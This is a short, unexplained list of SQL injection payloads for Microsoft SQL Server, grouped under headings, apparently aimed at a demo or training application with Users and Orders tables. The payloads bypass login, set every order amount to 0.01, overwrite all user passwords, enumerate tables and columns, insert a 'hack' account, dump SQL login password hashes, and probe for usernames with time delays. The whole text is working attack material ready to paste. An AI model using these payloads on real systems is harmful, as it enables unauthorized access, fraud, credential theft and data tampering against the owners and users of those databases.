Known User
========================
meg'--

Unkonwn User
========================
'OR 1=1--

Update
========================
'OR 1=1;UPDATE Orders SET Amount='0.01'--
'OR 1=1;UPDATE Users SET Password='x'--

Table Discovery
========================
'OR 1=1;INSERT INTO Orders SELECT 1,1,CAST(id AS VARCHAR),name FROM sysobjects WHERE xtype='U'--

Column Discovery
========================
'OR 1=1;INSERT INTO Orders SELECT 2,2,COLUMN_NAME,DATA_TYPE FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='Users'--
'OR 1=1;INSERT INTO Orders SELECT 3,3,COLUMN_NAME,DATA_TYPE FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='Orders'--

Add User
========================
'OR 1=1;INSERT INTO Users VALUES('hack','hack','hack')--

SQL User Discovery
========================
'OR 1=1;INSERT INTO Orders SELECT principal_id+1000,principal_id+1000,principal_id*1.0,name FROM sys.sql_logins UNION SELECT principal_id+1000,principal_id+1000,principal_id*1.0,master.dbo.fn_varbintohexstr(password_hash) FROM sys.sql_logins--

Blind Techniques
========================
';IF EXISTS(SELECT * FROM Users WHERE LoginName='root')WAITFOR DELAY '0:0:5'--
';IF EXISTS(SELECT * FROM Users WHERE LoginName='meg')WAITFOR DELAY '0:0:5'--
